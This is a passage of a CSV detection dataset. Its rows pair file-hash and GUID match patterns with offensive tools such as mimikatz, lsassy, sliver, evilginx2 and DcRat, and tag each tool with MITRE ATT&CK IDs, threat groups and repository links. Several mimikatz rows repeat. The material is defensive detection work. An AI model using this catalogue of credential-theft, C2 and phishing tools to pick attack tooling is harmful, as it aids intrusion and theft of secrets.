Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26615" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26616" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - 
APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26617" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26618" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26619" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - 
APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26620" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26621" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26622" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - 
APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26623" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26624" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26625" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - 
APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26626" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26627" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26628" "*51E46096-4A36-4C7D-9773-BC28DBDC4FC6*",".{0,1000}51E46096\-4A36\-4C7D\-9773\-BC28DBDC4FC6.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","26630" 
"*51eb3cd6442c856ef7e5170818e5bcab3594d6b3473a380c9a1555ca1dc2eb87*",".{0,1000}51eb3cd6442c856ef7e5170818e5bcab3594d6b3473a380c9a1555ca1dc2eb87.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26632" "*51ec632f44196675aac4e358940ac03d5a135a4d7dc150a5ee678203afec9fda*",".{0,1000}51ec632f44196675aac4e358940ac03d5a135a4d7dc150a5ee678203afec9fda.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26633" "*51ed625d1ce0d7de0a2cb6b61254c926154edd760f596eba6ef8bc6a50242108*",".{0,1000}51ed625d1ce0d7de0a2cb6b61254c926154edd760f596eba6ef8bc6a50242108.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","26634" 
"*51ed625d1ce0d7de0a2cb6b61254c926154edd760f596eba6ef8bc6a50242108*",".{0,1000}51ed625d1ce0d7de0a2cb6b61254c926154edd760f596eba6ef8bc6a50242108.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","26635" "*51ef910e61dfc492f4e1e1ad115b1c600175cffa379ae8a7035e6ba016ec7af5*",".{0,1000}51ef910e61dfc492f4e1e1ad115b1c600175cffa379ae8a7035e6ba016ec7af5.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","26636" "*51f92adcb4397e57d3809d3fa76bbf2cfb8ca772551b755ea8b0b3a6ba316334*",".{0,1000}51f92adcb4397e57d3809d3fa76bbf2cfb8ca772551b755ea8b0b3a6ba316334.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","#filehash","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","26638" "*51fecfd2da4eb46257e94548af984f53d88be1e8d476ef0bc64a801588dbb6b5*",".{0,1000}51fecfd2da4eb46257e94548af984f53d88be1e8d476ef0bc64a801588dbb6b5.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 
- T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","26639" "*52023815505f6a4a8e5a2c97c53ea87440261a404c639922f16899c859f596b9*",".{0,1000}52023815505f6a4a8e5a2c97c53ea87440261a404c639922f16899c859f596b9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26641" "*52040049-D7FC-4C72-B6AE-BD2C7AB27DEE*",".{0,1000}52040049\-D7FC\-4C72\-B6AE\-BD2C7AB27DEE.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#GUIDproject","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","26642" "*520411a91c6021dba0746e4520bb495db8d7c71c7b1813a95b9aae26531d493a*",".{0,1000}520411a91c6021dba0746e4520bb495db8d7c71c7b1813a95b9aae26531d493a.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","26643" 
"*52083b583a80716b034b5ea9c98d0070091d63c2a13771afa42268cec2de7b1d*",".{0,1000}52083b583a80716b034b5ea9c98d0070091d63c2a13771afa42268cec2de7b1d.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","26645" "*520f529151f419ccb0e75d9f9d2c9a24fb4809468dbd95360e4483672db46407*",".{0,1000}520f529151f419ccb0e75d9f9d2c9a24fb4809468dbd95360e4483672db46407.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","26646" "*52136cb222124a4b78b9cef3b9bd9e1a18a6687043597cb95138aa60bd26c76a*",".{0,1000}52136cb222124a4b78b9cef3b9bd9e1a18a6687043597cb95138aa60bd26c76a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26647" "*522690525ad617c5995ee43c1efcf7c4e43750e9118825f054cc2136e19d93a9*",".{0,1000}522690525ad617c5995ee43c1efcf7c4e43750e9118825f054cc2136e19d93a9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26649" 